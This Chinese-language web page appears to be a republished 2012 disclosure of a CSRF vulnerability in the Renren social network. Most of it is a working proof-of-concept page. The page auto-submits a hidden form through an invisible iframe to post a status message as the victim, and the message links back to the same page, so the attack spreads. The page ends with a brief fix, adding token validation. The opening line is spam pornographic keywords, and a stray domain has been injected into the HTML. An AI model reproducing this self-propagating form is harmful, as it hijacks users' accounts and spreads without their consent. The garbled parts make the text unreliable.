欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

人人網(wǎng)CSRF漏洞曝光及修復方案

  發(fā)布時間:2012-05-17 10:30:10   作者:佚名   我要評論
CSRF(Cross-site request forgery跨站請求偽造,也被稱成為“one click attack”或者session riding,通??s寫為CSRF或者XSRF,是一種對網(wǎng)站的惡意利用。盡管聽起來像跨站腳本(XSS),但它與XSS非常不同,并且攻擊方式幾乎相左。XSS利用站點內的信任用戶,而CSRF則通
腳本頁面http://bookman.sinaapp.com/doover.php,訪問該頁面后會發(fā)送一條狀態(tài)“已經(jīng)結束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php”
詳細說明:
看了下那個鏈接的源代碼,是通過人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要POST一個參數(shù)content到接口即可。
這個頁面post的content內容就是“已經(jīng)結束了,這是我的自白XXXX”。
 

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>愛你的說</title>
 
 
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
 
數(shù)字bookman愛你。歡迎訪問“肖寒Bookman”的人人空間。
 
 
<div id="kokia" style="float:left;display:none;">
 
  <form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
   <input type="text" name="synsbcp" www.dbjr.com.cn value="1"/>
  <p>raw: <input type="text" name="content" value="已經(jīng)結束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
  <input type="submit" value="Submit" />
</form>
 
</div>
 
 
<script>
       document.akiko.submit();
</script>
</body>
 
 
 
</html>
 

 
修復方案:
人人比我懂的多。以前有次flash的類似的,傳播是站內信吧。
補漏洞很簡單,加一個token驗證即可。
低級錯誤一枚,從網(wǎng)不行啊。

作者 leo108 AND 白熊一枚

相關文章

最新評論